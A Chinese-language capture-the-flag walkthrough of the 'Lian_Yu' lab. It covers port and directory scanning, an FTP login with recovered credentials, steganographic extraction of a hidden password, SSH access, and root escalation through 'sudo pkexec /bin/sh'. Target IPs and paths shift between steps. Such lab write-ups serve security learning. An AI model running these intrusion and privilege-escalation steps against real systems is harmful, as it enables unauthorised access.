Lian_Yu

端口扫描

root@ip-10-10-219-129:~# nmap -sTCV -p 21,22,80,111 10.10.5.62

Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-13 09:45 BST
Nmap scan report for ip-10-10-5-62.eu-west-1.compute.internal (10.10.5.62)
Host is up (0.00021s latency).

PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_  256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          43753/udp  status
|_  100024  1          55416/tcp  status
MAC Address: 02:55:5F:68:41:6F (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

80 - HTTP

20240531224844

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu]
└─$ gobuster dir -u http://10.10.217.19/ -w /usr/share/seclists/Discovery/Web-Content/common.txt  -t 150
    /island               (Status: 301) [Size: 234] [--> http://10.10.41.76/island/]
    /server-status        (Status: 403) [Size: 199]

20240531224901

注意这里的很明显是说了一般可能是隐藏了，我们查看源代码发现有一个单词这个可能是用户名: vigilante

20240531224913

再次目录扫描

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu]
└─$ gobuster dir -u http://10.10.217.19/island -w /usr/share/seclists/Discovery/Web-Content/common.txt  -t 150
    /2100                 (Status: 301) [Size: 239] [--> http://10.10.41.76/island/2100/]

20240531224928

这应该扫描到所有目录了，我们查看源代码发现：

20240531224944

很明显还存在一个隐藏文件再次扫描

┌──(jtz㉿JTZ)-[~]
└─$  gobuster dir -u http://10.10.217.19/sitemap/2100/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt  -t 150 -o gobuster_80_2.txt  -x .ticket
  /green_arrow.ticket   (Status: 200) [Size: 71]

20240531224950

这里我们再次得到一个凭据，可能是加密信息我们进行解密

20240531224959

信息总结

密码： !#th3h00d

21 - FTP

这可能是一个 FTP 账户

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu]
└─$ ftp 10.10.41.76
Connected to 10.10.41.76.
220 (vsFTPd 3.0.2)
Name (10.10.41.76:jtz): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33767|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
226 Directory send OK.

我们下载下来几个文件后进行查看，发现其中的 Leave_me_alone.png 存在一些问题，我们查看其十六进制发现文件头错误

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu]
└─$ exiftool Leave_me_alone.png
ExifTool Version Number         : 12.55
File Name                       : Leave_me_alone.png
Directory                       : .
File Size                       : 512 kB
File Modification Date/Time     : 2020:05:01 10:26:06+08:00
File Access Date/Time           : 2023:02:13 20:59:33+08:00
File Inode Change Date/Time     : 2023:02:13 20:59:33+08:00
File Permissions                : -rw-r--r--
Error                           : File format error

我们使用 hexeditor 查看

20240531225042

谷歌搜索 PNG 文件头进行修改

20240531225053

20240531225100

这里可能设计到文件隐写术，我们查看其他几个文件有没有附加信息

aa.jpg 中存在一个 zip 文件

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
└─$ steghide info aa.jpg
"aa.jpg":
  format: jpeg
  capacity: 11.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "ss.zip":
    size: 596.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

我们将其解压后发现其中是一个密码文件一个笔记文件

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
└─$ unzip ss.zip
Archive:  ss.zip
  inflating: passwd.txt
  inflating: shado
┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
└─$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***

a small Note about it

Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
└─$ cat shado
M3tahuman

现在我们已经获得了密码但是用户是什么?我们不知道

注意先查看你的 FTP 信息，你会发现一些不一样的内容

ftp> ls -al
229 Entering Extended Passive Mode (|||60095|).
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .
drwxr-xr-x    4 0        0            4096 May 01  2020 ..			# 上级目录一直往上你会发现直接把整个系统给共享了
-rw-------    1 1001     1001           44 May 01  2020 .bash_history
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||51601|).
150 Here comes the directory listing.
drwx------    2 1000     1000         4096 May 01  2020 slade
drwxr-xr-x    2 1001     1001         4096 May 05  2020 vigilante
226 Directory send OK.

后渗透

slade

┌──(jtz㉿JTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
└─$ ssh [email protected]
[email protected]'s password:
                              Way To SSH...
                          Loading.........Done..
                   Connecting To Lian_Yu  Happy Hacking

██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗
██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝
██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
 ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝


        ██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗
        ██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║
        ██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║
        ██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║
        ███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝
        ╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝  #

Last login: Mon Feb 13 07:46:39 2023 from ip-10-14-44-131.eu-west-1.compute.internal
slade@LianYu:~$ id
uid=1000(slade) gid=1000(slade) groups=1000(slade),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)
slade@LianYu:~$

slade --> root

slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

20240531225212

slade@LianYu:~$ sudo pkexec /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

Lian_Yu

端口扫描​

80 - HTTP​

21 - FTP​

后渗透​

slade​

slade --> root​

端口扫描

80 - HTTP

21 - FTP

后渗透

slade

slade --> root